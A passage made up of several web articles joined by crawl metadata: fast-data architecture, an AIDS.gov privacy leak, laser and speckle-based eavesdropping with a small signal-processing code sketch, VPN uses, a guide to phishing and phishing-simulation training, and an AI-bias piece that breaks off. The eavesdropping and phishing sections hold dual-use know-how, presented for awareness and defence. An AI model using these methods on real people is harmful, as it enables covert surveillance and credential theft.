might want to create credit risk models based on demographic data. That’s a big data challenge. A fast data architecture would be required if that credit card company wants to send fraud alerts to customers in real-time, when a suspicious activity occurs in their accounts. Think of FedEx. To track millions of packages and ensure on-time and accurate delivery across the planet, FedEx needs access to the right real-time data to perform real-time analysis and deliver the right interaction—right away, right there, not a day later. The fast data challenge Handling fast data, which pours in from mobile devices, sensor networks, retail systems, and telecommunications call-routing systems, is becoming a major challenge for data-driven organizations. To illustrate the complexity, let’s examine what’s meant by the fast data definition we’ve arrived at: enabling reactive engagement at the point of interaction. 
- The point of interaction could be a system making an API call, or a mobile app. - Engagement is defined as adding value to the interaction. It could be giving a tracking number to a customer after they place an order, a product recommendation based on a user’s browsing history, or a billing authorization or service upgrade. - Reactive is the fast part of fast data; it means the engagement action happens in hundreds of milliseconds for human interactions (machine-to-machine interactions that occur in an energy utility’s sensor network might not require such a near-real-time response). Fast data requires modern architectures that incorporate a database capable of handling massive, distributed data at speed, high-scale streaming technologies that can deliver events as rapidly as they occur, and logic at the point of interaction to deliver that engagement and value to the end user or end point. Businesses that have built a fast data software stack gain the ability to build applications that can process real-time data and output recommendations, analytics, and decisions in an appropriately quick manner. Regardless of whether it’s seconds or fractions of a second, enterprises need an architecture that can respond in the timeframe demanded by the market. With a fast data architecture in place, organizations also have the ability to shift the way they interact with customers very quickly.This became particularly important once COVID-19 struck. The Home Depot already relied on fast data to keep customers, store employees, and inventory synced. And because the company’s architecture was optimized for app and data velocity, it was able to shift to curbside delivery rapidly and smoothly. The bottom line: Fast data makes it possible to offer a user a “next best action” at the point when a user would find it most helpful—in any experience or business process. Learn how DataStax helps enterprises create modern data applications, built on the world’s most scalable data stack.
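To make the earlier fraud-alert example slightly more concrete, here is a toy sketch of the "react at the point of interaction" idea: each event is scored as it arrives instead of being batched for later analysis. The queue, threshold, and event fields are made-up stand-ins for a real streaming platform, not part of any vendor's architecture.

```python
# Minimal sketch of reacting to events as they arrive (fast data) rather than
# batching them for later analysis (big data). The in-memory queue stands in
# for a real stream; the rule and event fields are invented examples.
import queue
import time

events = queue.Queue()

def score(event: dict) -> bool:
    # Toy rule: flag unusually large purchases far from the cardholder's home country.
    return event["amount"] > 5_000 and event["country"] != event["home_country"]

def handle(event: dict) -> None:
    started = time.monotonic()
    if score(event):
        print(f"ALERT card {event['card']}: suspicious {event['amount']} in {event['country']}")
    # The whole decision should fit inside a few hundred milliseconds.
    print(f"decision latency: {(time.monotonic() - started) * 1000:.2f} ms")

events.put({"card": "1234", "amount": 9_800, "country": "BR", "home_country": "US"})
events.put({"card": "5678", "amount": 42, "country": "US", "home_country": "US"})

while not events.empty():
    handle(events.get())
```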
<urn:uuid:e056491e-7f37-4d7d-9237-41f0c2bd1de1>
CC-MAIN-2022-40
https://www.cio.com/article/191583/fast-data.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00051.warc.gz
en
0.91833
1,133
2.53125
3
US Government websites set to help people gain access to information about AIDS have been leaking the data about its users. Anyone visiting AIDS.gov and making use of the search box will probably be concerned to learn that, until the end of last month, data was transmitted in unencrypted form. The Washington Post points out that this data could be very easily intercepted and used to identify an individual. We know that web users are more concerned about privacy than ever before -- and little wonder when authorities say that privacy is not a right. We know that there are various ways in which web activity can be monitored, but it seems that the smartphone app associated with AIDS.gov included this feature as standard -- the app collected and transmitted the latitude and longitude of users, again unencrypted. Following questions from the Washington Post, Miguel Gomez, director of AIDS.gov, said: "We started requiring SSL for the [services] Locator because we understood that information should be encrypted to protect privacy". The Post points out that while encryption has been available "for those who knew how to activate it" since 2013, unencrypted data about people looking for healthcare information has been transmitted since 2010. AIDS.gov is not the only site which has a history of poor security. Another unnamed site which provides help with locating HIV testing centers, only started to encrypt user data this week. The lack of encryption was discovered by security researcher Steve Roosa, who was surprised to learn that a government-run service dealing with sensitive health information handled data so poorly. He found that widgets on the pages - such as Facebook, Twitter and other social elements - could create cookies that snoopers could easily intercept and use to identify individuals. This would be concerning for any website or app, but when dealing with AIDS and HIV which still - sadly - have great stigma attached to them, security is all the more important. Peter Eckersley from privacy advocates Electronic Frontier Foundation said: "We should be exasperated at the lack of security competence of so many branches of our government, when clearly that government does employ a lot of people who understand exactly how cyber-security works and how to break it".
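The underlying issue, form submissions and search queries travelling over plain HTTP, is easy to spot-check. The sketch below uses the third-party requests library to see whether a site redirects HTTP to HTTPS and sets an HSTS header; the hostname is a placeholder and the check is illustrative rather than a full security review.

```python
# Quick illustrative check: does a site force HTTPS and advertise HSTS?
# Uses the third-party "requests" library; the hostname is a placeholder example.
import requests

def check_transport_security(hostname: str) -> None:
    resp = requests.get(f"http://{hostname}/", timeout=10, allow_redirects=True)
    final_url = resp.url
    hsts = resp.headers.get("Strict-Transport-Security")
    print(f"{hostname}: final URL {final_url}")
    print("  redirected to HTTPS" if final_url.startswith("https://") else "  still plain HTTP")
    print(f"  HSTS header: {hsts or 'not set'}")

check_transport_security("example.org")   # placeholder hostname
```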
<urn:uuid:198d5a5a-292e-4614-9e4a-1fc2b462d264>
CC-MAIN-2022-40
https://www.itproportal.com/2014/11/10/us-government-let-aids-searchers-privacy/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00051.warc.gz
en
0.956748
436
2.609375
3
Play audio, or download as a podcast. Back in 1988, newspaper reports about laser beam eavesdropping swept the country. Our clients were scared. To learn exactly how scared they should be, we built a laser beam eavesdropping system and conducted a series of experiments. The following report to clients is the result of those experiments, plus our updated research. —- • —- Eavesdrop from afar, merely by pointing at a window. The idea is alluring to some, horrific to others. News media reports of just such a bugging device, based on laser beam technology, have been circulating for some time now. A litany of claims “…can hear from miles away,” and compound-claims “…through closed windows,” culminates with the coda “No one is safe.” Like the X-Ray vision glasses of comic book fame, laser beam eavesdropping claims tend to be exaggerated. But, like the concept of X-Ray vision, laser listening can be accomplished with the right equipment and conditions. Over a Century Old Invention April 26th, 1880 – Alexander Graham Bell & Sumner Tainter announce their invention – the Photophone. Sound is transmitted on reflected light-rays a distance of 213 meters. They also claim, “it can transmit songs with great purity of tone.” This is the forerunner of CDs, DVDs, fiber optic telephone transmission …and remote eavesdropping. Laser Beam Physics 101 (simplified) Sound is transmitted by vibration. When you speak, you vibrate the air. The air, in turn, vibrates everything it contacts. Certain objects, eg. windows and mirrors, pick up vibrations very easily. When a laser light beam hits such an object, it vibrates also as it reflects and continues its trip. The reflected, vibrating beam can be received; electronically processed; and then listened to. Under controlled conditions, very high quality audio can be recovered. Laser Beam Physics 202 (real world, real problems) Bouncing an invisible laser beam off a window, and attempting to catch the reflection, is a little like playing 3-D billiards – blindfolded. The fun increases exponentially with distance from the target. As if this doesn’t make reception difficult enough… the greater the angle of incidence, the greater the distortion of the received sound. All sound will vibrate a window. This includes interior conversations as well as exterior noises (cars, trucks, birds, etc.). Audio laboratory processing equipment can attenuate this effect, to a degree. We found, if the outside noise is as loud as the conversation indoors audio processing techniques are of marginal assistance. Reflecting a beam from interior room objects helps reduce external sound, however, the beam loses power with each pane of glass it passes through. This reduces effective working distances and increases the number of reflected beams with which one must cope. Thick glass and thermo-pane glass, as used in office buildings, does not conduct sound vibrations as well as thin residential plate glass. Air thermals, dust, wind, fog and rain disrupt laser beams. The greater the beam length, the greater the disruption. Wind blowing through a laser beam, we found, generates noise similar to the cacophony of airplane engines. A laser beam (one powerful enough for professional eavesdropping) is the Neutron Bomb equivalent of a sharp stick in the eye. Both can blind you, but the laser leaves the eye standing. Blinding the subject of a surveillance is not the best way of assuring a continued stream of information while remaining unnoticed. We used safety goggles during our tests. 
Laser Beam Spying Updates Advancements in signal processing have been made since 1988, however, the physics problems mentioned above remain. Consider trying to use laser eavesdropping in a business environment. Thick, double pane windows (which don’t open). Loud street noises. Few opportunities to face a target window at a right angle. There must be better ways to eavesdrop and spy,” I hear you say. There are. The laser beam is not your worst (or only) enemy. When it comes to your privacy and information security keep your outlook holistic. Don’t overlook age-old espionage techniques – like burglary, sex and blackmail. Laser Beam Spying – Today It is time to update our views on laser beam eavesdropping. While not entirely practical yet as an everyday amateur or business-level spy tool, advancements are being made. Researchers from Bar-Ilan University (Ramat-Gan, Israel) and the Universitat de València (Burjassot, Spain) developed a new way to sense sound remotely using a laser beam. Their research paper is titled: “Simultaneous remote extraction of multiple speech sources and heart beats from secondary speckles pattern” and the authors are: Zeev Zalevsky, Yevgeny Beiderman, Israel Margalit, Shimshon Gingold, Mina Teicher, Vicente Mico, and Javier Garcia. Unlike classic laser beam eavesdropping, the new method does not rely on interferometer or a reflecting diaphragm, like a window. A single laser beam is aimed at the object to be monitored (a person and a cell phone were used in these tests). The speckles that appear in an out-of-focus image of the object are then tracked. This produces data from which a spectrogram or sound signal can be constructed. The setup is basic. The laser illuminates a small area on the object and an ordinary digital camera captures the scene. The camera’s lens is de-focused. This produces a pattern that does not randomly change when the object moves. The camera image is processed, calculating the shift of the pattern from frame to frame. Laser beam audio samples… Note: Audio is labeled as listed in the research paper. However, it sounds like the neck and face audio clips may have been reversed. The Future of Remote Eavesdropping Eavesdropping-from-afar technologies such as: laser beam, microwave, ultra-wideband, ultra-sound and Tempest attacks will get better with age. We don’t discount them. Our clients know this topic has our serious attention and we will continue to keep them informed of new developments – with a realistic perspective. What will the future bring? Interception of brainwaves comes to mind… or, was that something you were thinking just now? Beat the Beam If you still suspect a laser beam eavesdropping attempt is being made against you, fight back… - Hold confidential conversations in a room without windows. - Place a radio against the window and close the drapes, or - Install a white noise generator on the window pane. Of course, do not discuss your suspicions within the target area. Seek out a professional Information Security Consultant / TSCM Specialist for additional assistance. Your problems are more extensive than you think. (v.190104)
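The speckle-based method described above ultimately comes down to estimating how the out-of-focus speckle pattern shifts from one video frame to the next, then treating that shift over time as an audio signal. The sketch below shows one generic way to do that step with phase correlation; the choice of phase correlation, the grayscale NumPy frames, and the function names are illustrative assumptions, not details taken from the research paper.

```python
import numpy as np

def estimate_shift(frame_a: np.ndarray, frame_b: np.ndarray) -> tuple[float, float]:
    """Estimate the (dy, dx) translation of the speckle pattern between two grayscale frames."""
    # Phase correlation: normalized cross-power spectrum, then an inverse FFT.
    fa = np.fft.fft2(frame_a)
    fb = np.fft.fft2(frame_b)
    cross_power = fa * np.conj(fb)
    cross_power /= np.abs(cross_power) + 1e-12   # avoid division by zero
    correlation = np.fft.ifft2(cross_power).real
    dy, dx = np.unravel_index(np.argmax(correlation), correlation.shape)
    # Shifts larger than half the frame wrap around and are really negative shifts.
    if dy > frame_a.shape[0] // 2:
        dy -= frame_a.shape[0]
    if dx > frame_a.shape[1] // 2:
        dx -= frame_a.shape[1]
    return float(dy), float(dx)

def frames_to_signal(frames: list[np.ndarray]) -> np.ndarray:
    """Track the vertical shift frame-to-frame; the result is proportional to the vibration."""
    return np.array([estimate_shift(frames[i], frames[i + 1])[0]
                     for i in range(len(frames) - 1)])
```

The recovered signal is sampled at the camera's frame rate, which caps the audio bandwidth that can be reconstructed; that is one practical reason the technique is still far from an everyday spy tool, as noted above.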
<urn:uuid:4ac4c7b4-ac60-4ca1-8099-395da1fd1854>
CC-MAIN-2022-40
https://counterespionage.com/laser-beam-eavesdropping/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00051.warc.gz
en
0.921609
1,478
2.796875
3
What is a VPN? How is it used? Why is it needed now more than ever before? Read on. Do you want to protect your online identity, stay safe on public wifi or bypass censorship on the internet? Then this article is for you. First a little background on how the internet world works: Your public IP address is discoverable by browsers, websites, service providers, and other devices. This opens the door for your privacy to be compromised. It can also mean that sensitive information falls into malicious hands. When using a VPN, instead of your public IP address being displayed, it uses the address of the VPN server that all of your internet activity is routed through. This VPN server could be located anywhere in the world, which makes it impossible for those interested to find out your true location, let alone any personal information. Moreover, VPNs have lists of countries, after you select one, you appear to be using the internet not from your actual location, but from the location of the virtual server. VPNs secure and protect your online identity. Most of the trusted VPN service providers use the latest encryption keys to hide your data from anyone trying to spy on your digital lifestyle. If servers are not obfuscated, however, your ISP can see if you are using a VPN, but it cannot decipher the contents of your internet traffic. It means your ISP cannot see anything you do while you are connected. The Virtual Private Network (VPN) Market is projected to grow at a CAGR of 6.39% to reach US$50.153 billion by 2024, from US$34.591 billion in 2018. The demand for VPNs will grow on account of the increasing cybercrime issues, as VPNs provide a secure and private network for individuals to access. In addition to this, many online services are acquiring VPN service providers to provide their own VPN services to users. However, since VPNs carry data to a different server before taking the user to the desired webpage, they witness some performance and speed issues, which restrains the demand for these services during the forecasted period. Here is a look at three VPN use cases you should know about. - By Pass Geo Restriction Geo-restriction or geo-blocking is a method to restrict or limit access of specified content based on the user’s geographic location. Average internet users usually encounter geo-restrictions on a daily basis while trying to access streaming platforms as they allow different content for different countries. Additionally, governments implement geo-restriction technologies to block sites or specific online services. How does geo-blocking work? All of your devices on the internet have their unique series of numbers called an Internet Protocol address (known as ‘IP address’). Your laptop, phone, and each device connected to the internet have IPs, which are provided by your internet service provider (ISP). Therefore, your ISP knows your IP address. When you visit a website, the IP address of your network is sent to the server so it knows where it has to send the content. Although your IP address is not significant on its own, using specialized software, it is possible to track your online behavior effortlessly, monitor which websites you visit and when. Also, to some extent, it is possible to know the geographical location of your device. This is how a site ‘knows’ from which country you are accessing. Then, website administrators apply geo-blocking based on this information. Moreover, geo-blocking applies when traveling. 
Meaning, if you are an American visiting France, you will only access the content available in France. Is bypassing geo-blocking legal? The legality of getting around geo-restrictions is unclear and varies by country. In the European Union, some forms of geo-blocking are illegal. Companies are not allowed to discriminate against consumers based on their location for online sales of specific services. However, streaming platforms, such as Netflix, claim that bypassing geo-blocking can be considered a violation of copyright and licensing regulations, and they use this to justify methods to detect and block various anonymizer services, like VPNs. There are tools to get around geo-restrictions; VPNs are the most common and, usually, easy to use for a less tech-savvy audience. While using a VPN service, you can quickly change your location and have unrestricted and fast access to any website. You can choose your desired location, or let us offer an optimal choice for you. Local VPN servers represent a private, controlled network. The VPN creates a virtual tunnel in which your data is encrypted, so that no one can track or monitor your online activities. A VPN masks your actual IP address and allocates you one from your chosen country. For instance, if you are in the USA, you can quickly select a remote VPN server in Japan, and the website will think you are accessing it from Japan. VPNs also help to bypass government-induced censorship. In this case, VPNs not only help to achieve internet freedom but also fully secure your data from the prying eyes of snoopers. 2. Avoid Government Censorship Internet censorship is the practice of blocking, limiting, filtering or manipulating internet content in any way. It is a method of suppression used by governments to control what can be accessed, published or viewed online. Although censorship might seem like something done only by oppressive governments, its scope has been increasing alarmingly in many democratic countries. More than 60 countries engage in some form of state-sponsored censorship. Restrictions and manipulations vary from limiting access to digital content (such as movies, series or music), to blocking certain websites or services (Skype, Telegram, WhatsApp, YouTube, Netflix, etc.), to filtering information perceived as unwanted (for instance, anything opposing the government). Who is usually affected by internet censorship? Various attempts to tighten internet control and crack down on online freedom have a harmful impact on journalists, human rights activists, marginalized communities, as well as ordinary internet users who want to access information or services online. Why do governments engage in various forms of internet censorship? The intents vary. It can be done to spread the government’s views and particular agendas, and to silence government critics and opposing views. There are a few methods to surf the internet without borders. A VPN (virtual private network) is a robust tool for accessing free information online. It is also safe, because it hides your online activities from the censors. 3. Stay Safe on Public WiFi Public WiFi can be a goldmine for dangerous lurkers posing security threats. It’s convenient, yet dangerous, to use while traveling or dining out in the city. All the traffic within a public WiFi network is usually unsecured, meaning it does not use proper encryption to protect your internet data.
Sensitive information sent via an unsecured WiFi network (such as credit card numbers, passwords, and chat messages) becomes an easy target for hackers. When it comes to stealing your data, hackers get quite creative. One of the ways they attack is called man-in-the-middle (MITM). Cybercriminals will create their own fake public network. In most cases, its name will be similar to that of a nearby place offering public access (like a restaurant or hotel). Then, hackers will snoop on your private information and target data on your devices. On top of that, hackers can install packet-sniffing software. It is particularly dangerous because it records massive amounts of data which can later be processed at the attacker’s leisure. Be aware that there are many other ways to undermine your privacy while you’re connected to public WiFi. The internet is full of video tutorials and step-by-step guides on how to hack someone’s computer over a WiFi network. All WiFi networks are vulnerable to hacking. If you are not alone in using the network, chances are someone is spying on your online activities. At best it is your ISP; at worst, scammers lurking for your passwords, bank account details or other sensitive information. In 2017, Belgian researchers discovered that the WPA2 protocol used by the vast majority of WiFi networks is unsafe. According to the report, the WPA2 protocol can be broken using novel attacks, potentially exposing personal data. The vulnerability can affect a broad range of operating systems and devices – including Android, Apple, Windows, Linux, OpenBSD, MediaTek, etc. Basically, if you have a device that connects to WiFi, it can be affected. The situation is a little different in the European Union since the General Data Protection Regulation (GDPR) took effect. ISPs processing Europeans’ data must be compliant with the GDPR. They have to make sure they store personal data only with consent and in a form that is not linkable to an individual. What can you do to protect your online identity? A VPN is the best option for shielding your private information from cybercriminals. If you are connected to a VPN, your connection is secure even if you’re on a public WiFi hotspot.
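A quick way to verify that a VPN really is masking your public IP address is to ask an IP-echo service what address it sees, once before connecting and once after. A minimal sketch follows; api.ipify.org is a public echo service used here purely for illustration, and any equivalent service would do.

```python
import urllib.request

def current_public_ip(timeout: float = 5.0) -> str:
    """Return the public IP address that remote servers currently see for this machine."""
    # api.ipify.org answers with the caller's public IP as plain text.
    with urllib.request.urlopen("https://api.ipify.org", timeout=timeout) as resp:
        return resp.read().decode("utf-8").strip()

if __name__ == "__main__":
    # Run once before and once after connecting to the VPN; the two addresses
    # should differ, and the second should belong to the VPN provider.
    print("Public IP as seen by remote servers:", current_public_ip())
```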
<urn:uuid:0431d9ce-a998-4065-82b3-13e5c5c12e5c>
CC-MAIN-2022-40
https://dataconomy.com/2020/02/three-vpn-use-cases-you-should-know-about/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00051.warc.gz
en
0.933992
1,876
2.796875
3
The Ultimate Guide To Understanding Phishing In 2022 So, what is phishing? Phishing is a form of social engineering that tricks people into revealing their passwords or valuable information. Phishing attacks can be in the form of emails, text messages, and phone calls. Usually, these attacks pose as popular services and companies that people recognize easily. When users click a phishing link in the body of an email, they are sent to a lookalike version of a site they trust. They are asked for their login credentials at this point in the phishing scam. Once they enter their information on the fake website, the attacker has what they need to access their real account. Phishing attacks can result in stolen personal information, financial information, or health information. Once the attacker gets access to one account, they either sell the access to the account or use that information to hack other accounts of the victim. Once the account is sold, someone who knows how to profit from the account will buy the account credentials from the dark web, and capitalize on the stolen data. Here is a visualization to help you understand the steps in a phishing attack: Phishing attacks come in different forms. Phishing can work from a phone call, text message, email, or social media message. Generic phishing emails are the most common type of phishing attack. Attacks like these are common because they take the least amount of effort. Hackers take a list of email addresses associated with Paypal or social media accounts and send a bulk email blast to the potential victims. When the victim clicks the link in the email, it often takes them to a fake version of a popular website and asks them to log in with their account info. As soon as they submit their account info, the hacker has what they need to access their account. In a sense, this type of phishing is like casting out a net into a school of fish; whereas other forms of phishing are more targeted efforts. Spear phishing is when an attacker targets a specific individual rather than sending a generic email to a group of people. Spear phishing attacks try to specifically address the target and disguise themselves as a person the victim may know. These attacks are easier for a scammer if you have personally identifiable information on the internet. The attacker is able to research you and your network to craft a message that is relevant and convincing. Due to the high amount of personalization, spear phishing attacks are much harder to identify compared to regular phishing attacks. They are also less common, because they take more time for criminals to pull them off successfully. Question: What’s the success rate of a spearphishing email? Answer: Spearphishing emails have an average email open-rate of 70% and 50% of recipients click a link in the email. Compared to spear phishing attacks, whaling attacks are drastically more targeted. Whaling attacks go after individuals in an organization such as the chief executive officer or chief financial officer of a company. One of the most common goals of whaling attacks is to manipulate the victim into wiring large sums of money to the attacker. Similar to regular phishing in that the attack is in the form of the email, whaling may use company logos and similar addresses to disguise themselves. In some instances, the attacker will impersonate the CEO and use that persona to convince another employee to reveal financial data or transfer money to the attackers account. 
Since employees are less likely to refuse a request from somebody higher up, these attacks are much more devious. Attackers will often spend more time crafting a whaling attack because they tend to pay off better. The name “whaling” refers to the fact that targets have more financial power (CEO’s). Angler phishing is a relatively new type of phishing attack and exists on social media. They do not follow the traditional email format of phishing attacks. Instead, they disguise themselves as customer service representatives of companies and trick people into sending them information through direct messages. A common scam is to send people to a fake customer support website that will download malware or in other words ransomware onto the victim’s device. A vishing attack is when a scammer calls you to attempt to gather personal information from you. Scammers usually pretend to be a reputable business or organization such as Microsoft, the IRS, or even your bank. They use fear-tactics to get you to reveal important account data. This allows them to directly or indirectly access your important accounts. Vishing attacks are tricky. Attackers can easily impersonate people that you trust. Watch Hailbytes Founder David McHale talk about how robocalls will vanish with future technology. Most phishing attacks occur through emails, but there are ways to identify their legitimacy. When you open up an email check to see whether or not its from a public email domain (ie. @gmail.com). If it is from a public email domain, it is most likely a phishing attack as organizations do not use public domains. Rather, their domains would be unique to their business (ie. Google’s email domain is @google.com). However, there are trickier phishing attacks that use a unique domain. It’s useful to do a quick search of the company and check its legitimacy. Phishing attacks always attempt to befriend you with a nice greeting or empathy. For example, in my spam not too long ago I found a phishing email with the greeting of “Dear friend”. I already knew this was a phishing email as in the subject line it said, “GOOD NEWS ABOUT YOUR FUNDS 21 /06/2020”. Seeing those types of greetings should be instant red flags if you have never interacted with that contact. The contents of a phishing email are very important, and you’ll see some distinctive features that make up most. If the contents sound absurd, then most likely it’s a scam. For example, if the subject line said, “You won the Lottery $1000000” and you have no recollection of participating then that’s a red flag. When the content creates a sense of urgency like “it depends on you” and it leads to clicking a suspicious link then it is most likely a scam. Phishing emails always have a suspicious link or file attached to them. A good way to check if a link has a virus is to use VirusTotal, a website that checks files or links for malware. Example Of Phishing Email: In the example, Google points out that the email can be potentially dangerous. It recognizes that its content matches with other similar phishing emails. If an email meets most of the criteria above, then it’s recommended to report it to [email protected] or [email protected] so that it gets blocked. If you are using Gmail there is an option to report the email for phishing. Even though phishing attacks are geared towards random users they often target employees of a company. However attackers are not always after a company’s money but its data. 
In terms of business, data is far more valuable than money and it can severely impact a company. Attackers can use leaked data to influence the public by impacting consumer trust and tarnishing the company name. But that’s not the only consequences that can result from that. Other consequences include negative impact on investor trust, disrupt business, and incite regulatory fines under the General Data Protection Regulation (GDPR). Training your employees to deal with this problem is recommended to reduce successful phishing attacks. Ways to train employees generally are to show them examples of phishing emails and the ways to spot them. Another good way to show employees phishing is through simulation. Phishing simulations are basically fake attacks designed to help employees recognize phishing firsthand without any negative effects. We will now share the steps you need to take to run a successful phishing campaign. Phishing remains to be the top security threat according to WIPRO’s state of cybersecurity report 2020. One of the best ways to collect data and educate employees is to run an internal phishing campaign. It can be easy enough to create a phishing email with a phishing platform, but there is a lot more to it than hitting send. We will discuss how to handle phishing tests with internal communications. Then, we will go over how you analyze and use the data that you collect. A phishing campaign isn’t about punishing people if they fall for a scam. A phishing simulation is about teaching employees how to respond to phishing emails. You want to make sure that you’re being transparent about doing phishing training in your company. Prioritize informing company leaders about your phishing campaign and describe the goals of the campaign. After you send your first baseline phishing email test, you can make a company-wide announcement to all employees. An important aspect of internal communications is to keep the message consistent. If you are doing your own phishing tests, then it’s a good idea to come up with a made up brand for your training material. Coming up with a name for your program will help employees recognize your educational content in their inbox. If you are using a managed phishing test service, then they will likely have this covered. Educational content should be produced ahead of time so that you can have an immediate follow-up after your campaign. Give your employees instructions and information about your internal phishing email protocol after your baseline test. You want to give your co-workers the opportunity to respond correctly to the training. Seeing the number of people that correctly spot and report the email is important information to gain from the phishing test. What should be your top priority for your campaign? You can try to base your results on the number of successes and failures, but those numbers don’t necessarily help you with your purpose. If you run a phishing test simulation and nobody clicks on the link, does that mean that your test was successful? The short answer is “no”. Having a 100% success rate doesn’t translate as a success. It can mean that your phishing test was simply too easy to spot. On the other hand, if you get a tremendous failure rate with your phishing test, it could mean something completely different. It could mean that your employees aren’t able to spot phishing attacks yet. When you get a high rate of clicks for your campaign, there is a good chance that you need to lower the difficulty of your phishing emails. 
Take more time to train people at their current level. You ultimately want to decrease the rate of phishing link clicks. You may be wondering what a good or bad click rate is with a phishing simulation. According to sans.org, your first phishing simulation may yield an average click rate of 25-30%. That seems like a really high number. Luckily, they reported that after 9-18 months of phishing training, the click rate for a phishing test was below 5%. These numbers can help as a rough estimate of your desired results from phishing training. To start your first phishing email simulation, make sure to whitelist the IP address of the testing tool. This makes sure that employees will receive the email. When crafting your first simulated phishing email don’t make it too easy or too hard. You should also remember your audience. If your coworkers are not heavy users of social media, then it probably wouldn’t be a good idea to use a fake LinkedIn password reset phishing email. The tester email has to have enough broad appeal that everyone in your company would have a reason to click. Some examples of phishing emails with broad appeal could be: Just remember the psychology of how the message will be taken by your audience before hitting send. Continue to send phishing training emails to your employees. Make sure that you are slowly increasing the difficulty over time to increase people’s skill levels. It’s recommended to do monthly email sends. If you “phish” your organization too often, they are likely to catch on a little too quickly. Catching your employees, a little bit off-guard is the best way to get more realistic results. If you send the same type of “phishing” emails every time, you’re not going to teach your employees how to react to different scams. You can try several different angles including: As you send new campaigns, always make sure that you are fine tuning the relevance of the message to your audience. If you send a phishing email that isn’t related to something of interest, you may not get much of a response from your campaign. After sending different campaigns to your employees, refresh some of the old campaigns that tricked people the first time and do a new spin on that campaign. You’ll be able to tell the effectiveness of your training if you see that people are either learning and improving. From there you will be able to tell if they need more education on how to spot a certain type of phishing email. There are 3 factors in determining whether you are going to create your own phishing training program or outsource the program. If you are a security engineer or have one in your company, you can easily spawn up a phishing server using a pre-existing phishing platform to create your campaigns. If you don’t have any security engineers, creating your own phishing program may be out of the question. You may have a security engineer in your organization, but they may not be experienced with social engineering or phishing tests. If you have someone that is experienced, then they would be reliable enough to create their own phishing program. This one is a really big factor for small to mid-sized companies. If your team is small, it might not be convenient to add another task to your security team. It is a lot more convenient to have another experienced team do the work for you. You’ve gone through this whole guide to figure out how you can train your employees and you’re ready to start protecting your organization through phishing training. 
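Before moving on, it is worth wiring those click-rate numbers into whatever reporting you do after each campaign. A minimal sketch, assuming you can export per-recipient results (delivered / clicked / reported) from whatever phishing platform you use; the example figures are invented for illustration.

```python
from dataclasses import dataclass

@dataclass
class CampaignResult:
    delivered: int   # emails that reached an inbox
    clicked: int     # recipients who clicked the simulated phishing link
    reported: int    # recipients who reported the email as phishing

def click_rate(r: CampaignResult) -> float:
    return r.clicked / r.delivered if r.delivered else 0.0

def report_rate(r: CampaignResult) -> float:
    return r.reported / r.delivered if r.delivered else 0.0

# Illustrative numbers: a first baseline campaign versus a later follow-up.
baseline = CampaignResult(delivered=400, clicked=112, reported=35)
followup = CampaignResult(delivered=400, clicked=22, reported=140)

for name, result in [("baseline", baseline), ("follow-up", followup)]:
    print(f"{name}: click rate {click_rate(result):.1%}, report rate {report_rate(result):.1%}")
```

Tracking the report rate alongside the click rate matters, since a falling click rate with a rising report rate is the clearest sign the training is working.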
If you are a security engineer and want to start running your first phishing campaigns now, go here to learn more about a phishing simulation tool that you can use to get started today. If you are interested in learning about managed services to run phishing campaigns for you, learn more right here about how you can start your free trial of phishing training. Use the checklist to identify unusual emails and if they are phishing then report them. Even though there are phishing filters out there that can protect you, it’s not 100%. Phishing emails are constantly evolving and are never the same. To protect your company from phishing attacks you can partake in phishing simulations to decrease chances of successful phishing attacks. We hope that you learned enough from this guide to figure out what you need to do next to decrease your chances of a phishing attack on your business. Please leave a comment if you have any questions for us or if you want to share any of your knowledge or experience with phishing campaigns. Don’t forget to share this guide and spread the word!
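Finally, the "is this from a public email domain?" test suggested earlier in the guide is simple enough to automate as a first-pass filter. A minimal sketch; the domain list is a small illustrative sample rather than an exhaustive one, and the lookalike check is only a rough heuristic.

```python
PUBLIC_EMAIL_DOMAINS = {
    "gmail.com", "yahoo.com", "outlook.com", "hotmail.com", "aol.com", "mail.com",
}

def sender_domain(address: str) -> str:
    """Return the domain part of an email address, lower-cased."""
    return address.rsplit("@", 1)[-1].strip().lower()

def looks_suspicious(sender: str, claimed_company_domain: str) -> bool:
    """Flag senders that claim to be a company but mail from a public domain,
    or whose domain merely resembles the company's (a common lookalike trick)."""
    domain = sender_domain(sender)
    if domain in PUBLIC_EMAIL_DOMAINS:
        return True
    # An exact match with the real corporate domain is fine; anything else that
    # contains the company name (e.g. "google-support.net") deserves a closer look.
    company = claimed_company_domain.lower()
    return domain != company and company.split(".")[0] in domain

print(looks_suspicious("security-alert@gmail.com", "google.com"))      # True
print(looks_suspicious("no-reply@google-support.net", "google.com"))   # True
print(looks_suspicious("no-reply@google.com", "google.com"))           # False
```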
<urn:uuid:a13edee1-1004-4ecf-81a9-c3a34168d24d>
CC-MAIN-2022-40
https://hailbytes.com/the-ultimate-guide-to-understanding-phishing-in-2022/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00051.warc.gz
en
0.940584
3,261
3.390625
3
The link between artificial intelligence (AI) and bias is alarming. As AI evolves to become more human-like, it’s becoming clear that human bias is impacting technology in negative, potentially dangerous ways. Here, we explore how AI and bias are linked and what’s being done to reduce the impact of bias in AI applications: 3 questions on AI and bias 1. How does bias in AI impact automated decision systems? Using AI in decision-making processes has become commonplace, mostly because predictive analytics algorithms can perform the work of humans at a much faster and often more accurate rate. Decisions are being made by AI on small matters, like restaurant preferences, and critical issues, like determining which patient should receive an organ donation. While the stakes may differ, whether human bias is playing a role in AI decisions is sure to impact outcomes. Bad product recommendations impact retailer profit, and medical decisions can directly impact individual patient lives. Vincent C. Müller takes a look at AI and bias in his research paper, “Ethics of Artificial Intelligence and Robotics,” included in the Summer 2021 edition of “The Stanford Encyclopedia of Philosophy.” Fairness in policing is a primary concern, Müller says, noting that human bias exists in the data sets used by police to decide, for example, where to focus patrols or which prisoners are likely to re-offend. This kind of “predictive policing,” Müller says, relies heavily on data influenced by cognitive biases, especially confirmation bias, even when the bias is implicit and unknown to human programmers. Christina Pazzanese refers to the work of political philosopher Michael Sandel, a professor of government, in her article, “Great promise but potential for 